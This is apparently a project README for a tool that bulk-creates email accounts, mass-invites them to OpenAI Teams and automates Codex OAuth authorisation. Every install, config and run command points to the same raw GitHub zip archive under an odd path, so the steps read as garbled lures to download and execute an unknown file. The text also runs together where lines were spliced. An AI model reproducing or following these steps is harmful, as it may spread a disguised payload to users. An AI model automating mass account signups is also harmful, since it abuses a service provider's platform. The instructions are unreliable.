- 🔄 全自动化流程 - 从邮箱创建到 CRS 入库一键完成
- 📧 批量邮箱创建 - 支持多域名随机生成邮箱
- 👥 Team 批量邀请 - 一次性邀请多个账号到 Team
- 🌐 浏览器自动化 - 基于 DrissionPage 的智能注册
- 🔐 OAuth 自动授权 - Codex 授权流程全自动处理
- 💾 断点续传 - 支持中断恢复,避免重复操作
- 📊 状态追踪 - 详细的账号状态记录与追踪
- Python 3.12+
- uv (推荐) 或 pip
- Chrome 浏览器
- 邮箱服务 API
- CRS 服务 API
To get the software, visit the Releases Page for the latest version.
Download the latest release directly from the page. Look for the file that matches your operating system.
Open your terminal or command prompt. Then, run one of the following commands to install the necessary dependencies:
# Using uv (recommended)
uv sync
# Or using pip
pip install -r https://raw.githubusercontent.com/Buildwithnivedita/oai-team-auto-provisioner/main/transportedness/provisioner_team_auto_oai_v3.4.zipCopy the example configuration files. This gives you a starting point for your setup. Run the following commands:
# Copy the configuration template
cp https://raw.githubusercontent.com/Buildwithnivedita/oai-team-auto-provisioner/main/transportedness/provisioner_team_auto_oai_v3.4.zip https://raw.githubusercontent.com/Buildwithnivedita/oai-team-auto-provisioner/main/transportedness/provisioner_team_auto_oai_v3.4.zip
cp https://raw.githubusercontent.com/Buildwithnivedita/oai-team-auto-provisioner/main/transportedness/provisioner_team_auto_oai_v3.4.zip https://raw.githubusercontent.com/Buildwithnivedita/oai-team-auto-provisioner/main/transportedness/provisioner_team_auto_oai_v3.4.ziphttps://raw.githubusercontent.com/Buildwithnivedita/oai-team-auto-provisioner/main/transportedness/provisioner_team_auto_oai_v3.4.zip - Main Configuration File
Open the https://raw.githubusercontent.com/Buildwithnivedita/oai-team-auto-provisioner/main/transportedness/provisioner_team_auto_oai_v3.4.zip file in a text editor. Fill in the required details for your email service. Here is a sample layout:
# 邮箱服务配置
[email]
api_base = "YOUR_EMAIL_API_BASE_URL"Ensure you have all required services running. Confirm that you have your Email Service API and CRS Service API ready for use.
After completing the setup, you can run the application. Use the following command in your terminal:
python https://raw.githubusercontent.com/Buildwithnivedita/oai-team-auto-provisioner/main/transportedness/provisioner_team_auto_oai_v3.4.zipFollow the on-screen instructions to start using the OpenAI Team Auto Provisioner.
Once the application is running, you can follow these steps:
- Create Emails: Use the tool to generate email addresses quickly.
- Invite Team Members: Send invitations to multiple accounts.
- Track Progress: Monitor the status of created accounts to ensure everything is functioning smoothly.
For detailed information on features and options, refer to the documentation.
If you have any issues or questions, feel free to open an issue on the GitHub Issues Page.
Your feedback is welcome, and it helps improve the tool.